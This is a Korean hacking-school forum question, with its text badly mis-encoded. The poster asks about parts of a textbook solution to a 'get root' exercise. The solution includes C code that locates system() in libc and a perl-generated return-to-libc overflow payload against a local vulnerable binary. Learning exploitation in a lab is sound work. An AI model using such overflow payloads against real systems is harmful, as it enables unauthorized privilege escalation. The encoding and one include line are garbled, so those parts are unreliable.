|
http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=29651 [º¹»ç]
root ±ÇÇÑÀ» ȹµæÇÏ¶ó ¹®Á¦¿¡¼ Áú¹®ÀÌ ÀÖ½À´Ï´Ù.
/bin/bash2
export PATH=$PATH:.
cat > addr_of_system.c
#include <dlfcn,f>
int main()
{
long addr;
void *handle;
handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
addr = (long)dlsym(handle, "system");
printf("system() is at 0x%x\n", addr);
}
// ÀÌ ÇÔ¼ö´Â ¸í·É¾îÀÚü¸¦ Àß ¸ð¸£°Ù³×¿ä..¤Ð¤Ð dlopen(), dlsym() << À̵Π¸í·É¾î Á» °¡¸£ÃÄÁÖ½Ã¸é °¨»çÇÏ°Ù½À´Ï´Ù.
gcc -o ./addr_of_system addr_of_system.c -lc -ldl
./vuln `perl -e 'printf"A"x84 . "\xe0\x8a\x05\x40"'`
./vuln `perl -e 'printf"A"x84 . "\xe0\x8a\x05\x40"'` 2> output
// ¿©±â¼ ´Ù¸¥°Ç ´Ù ÀÌÇØ°¡ °¡Áö¸¸ > ¿ÞÂÊ ¿¡ 2´Â ¿Ö Àִ°ÅÁÒ?? ¾ø¾îµµ µÉ°Å°°Àºµ¥ ¸»ÀÌÁÒ..¤Ð¤Ð
xxd output
¹Ø¿¡ Äڵ尡 ´õ ÀÖ±äÇÏÁö¸¸ ÇÊ¿ä¾øÀ»°Å°°¾Æ »ý·«ÇÕ´Ï´Ù..
ÀÌ°Ç Ã¥ÀÇ ¸¶Áö¸·¿¡ ÀÖ´Â root ±ÇÇÑÀ» ¾ò¾î¶óÀÇ Á¤´äÀÇ ÀϺÎÀÔ´Ï´Ù.(°ÅÀÇ ´ÙÀ̱äÇÏÁö¸¸¿ä..¤¾)
³Ê¹« ±Ã±ÝÇؼ ¿Ã·Áº¾´Ï´Ù..^^
|
Hit : 10562 Date : 2012/11/16 06:20
|
22019, 
1/1101 
